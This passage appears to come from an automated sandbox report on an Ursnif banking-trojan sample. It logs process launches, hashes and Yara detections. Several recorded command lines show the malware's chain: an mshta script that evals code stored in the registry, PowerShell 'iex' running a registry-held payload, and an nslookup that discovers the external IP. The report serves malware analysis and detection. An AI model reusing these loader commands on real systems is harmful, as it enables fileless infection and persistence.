                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, Author: Joe Security
                                                          Reputation: moderate

                                                          General

                                                          Start time: 01:30:59
                                                          Start date: 07/10/2021
                                                          Path: C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
                                                          Imagebase: 0x11d0000
                                                          File size: 232960 bytes
                                                          MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Reputation: high

                                                          General

                                                          Start time: 01:30:59
                                                          Start date: 07/10/2021
                                                          Path: C:\Windows\SysWOW64\rundll32.exe
                                                          Wow64 process (32bit): true
                                                          Commandline: rundll32.exe C:\Users\user\Desktop\data.dll,Bonebegin
                                                          Imagebase: 0xfe0000
                                                          File size: 61952 bytes
                                                          MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                          Has elevated privileges: true
                                                          Has administrator privileges: true
                                                          Programmed in: C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:high

General

Start time: 01:30:59
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe 'C:\Users\user\Desktop\data.dll',#1
Imagebase: 0xfe0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 01:31:03
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\data.dll,Father
Imagebase: 0xfe0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 01:31:07
Start date: 07/10/2021
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\data.dll,Ratherdesign
Imagebase: 0xfe0000
File size: 61952 bytes
MD5 hash: D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, Author: Joe Security
Reputation: high

General

Start time: 01:32:26
Start date: 07/10/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Qod1='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qod1).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase: 0x7ff7884e0000
File size: 14848 bytes
MD5 hash: 197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 01:32:27
Start date: 07/10/2021
Path: C:\Windows\System32\mshta.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Dsd4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Dsd4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Imagebase: 0x7ff7884e0000
File size: 14848 bytes
MD5 hash: 197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 01:32:27
Start date: 07/10/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 01:32:28
Start date: 07/10/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:32:29
Start date: 07/10/2021
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Imagebase: 0x7ff7bedd0000
File size: 447488 bytes
MD5 hash: 95000560239032BC68B4C2FDFCDEF913
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 01:32:29
Start date: 07/10/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 01:32:34
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
Imagebase: 0x7ff6bf5b0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 01:32:34
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
Imagebase: 0x7ff6bf5b0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 01:32:35
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF604.tmp' 'c:\Users\user\AppData\Local\Temp\a52acufz\CSCA20CD7516B4D483281CF5F38543E99A.TMP'
Imagebase: 0x7ff61d650000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:35
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESF652.tmp' 'c:\Users\user\AppData\Local\Temp\aixojixg\CSC8AF62C77111B490CBA18A772C2BF28D9.TMP'
Imagebase: 0x7ff61d650000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:37
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
Imagebase: 0x7ff6bf5b0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 01:32:37
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
Imagebase: 0x7ff6bf5b0000
File size: 2739304 bytes
MD5 hash: B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET

General

Start time: 01:32:38
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES20A.tmp' 'c:\Users\user\AppData\Local\Temp\ddwuzigh\CSCFB1F6E3C794C45BDA93B7DDF91AC3ADC.TMP'
Imagebase: 0x7ff61d650000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:39
Start date: 07/10/2021
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES47B.tmp' 'c:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP'
Imagebase: 0x7ff61d650000
File size: 47280 bytes
MD5 hash: 33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:44
Start date: 07/10/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff6fee60000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, Author: Joe Security

General

Start time: 01:32:47
Start date: 07/10/2021
Path: C:\Windows\System32\control.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\control.exe -h
Imagebase: 0x7ff7880b0000
File size: 117760 bytes
MD5 hash: 625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:51
Start date: 07/10/2021
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Imagebase: 0x7ff66d750000
File size: 69632 bytes
MD5 hash: 73C519F050C20580F8A62C849D49215A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

General

Start time: 01:32:51
Start date: 07/10/2021
Path: C:\Windows\System32\control.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\control.exe -h
Imagebase: 0x7ff7880b0000
File size: 117760 bytes
MD5 hash: 625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:07
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:19
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:22
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:23
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\nslookup.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:nslookup myip.opendns.com resolver1.opendns.com
                                                          Imagebase:0x7ff73b890000
                                                          File size:86528 bytes
                                                          MD5 hash:AF1787F1DBE0053D74FC687E7233F8CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:cmd /C 'echo -------- >> C:\Users\user\AppData\Local\Temp\380E.bi1'
                                                          Imagebase:0x7ff622070000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:26
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\rundll32.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                          Imagebase:0x7ff66d750000
                                                          File size:69632 bytes
                                                          MD5 hash:73C519F050C20580F8A62C849D49215A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:35
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:33:38
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff724c50000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:01:33:54
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6b0ff0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, Author: Joe Security

                                                          General

                                                          Start time:01:34:00
                                                          Start date:07/10/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Windows\syswow64\cmd.exe' /C pause dll mail, ,
                                                          Imagebase:0x11d0000
                                                          File size:232960 bytes
                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, Author: Joe Security
